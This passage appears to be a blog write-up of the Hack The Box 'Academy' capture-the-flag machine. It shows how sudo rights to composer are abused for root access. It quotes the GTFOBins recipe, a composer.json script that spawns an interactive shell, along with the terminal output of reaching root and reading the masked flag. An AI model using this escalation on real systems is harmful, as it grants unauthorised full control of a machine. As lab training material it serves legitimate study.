Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

user mrb3n can run composer command. 

Checking in GTFOBINS, we can search if this command may be used to escalate privileges.

https://gtfobins.github.io/gtfobins/composer/

If the binary is allowed to run as a superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

mrb3n@academy:~$ nano shell.sh
mrb3n@academy:~$ chmod +x shell.sh
mrb3n@academy:~$ ./shell.sh

PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
#bash
root@academy:/tmp/tmp.JEDMys351B# cd 
root@academy:~# whoami
root
root@academy:~# ls
academy.txt  root.txt  snap
root@academy:~# cat academy.txt 
                                                                                   We've been hard at work.
Check out our brand new training platform, Hack the Box Academy!

https://academy.hackthebox.eu/

Register an account and browse our initial list of courses!

   _.-'`'-._
   .-'    _    '-.
    `-.__  `\_.-'
      |  `-``\|
      `-.....-H
              T
              B

root@academy:~# cat root.txt

d551XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *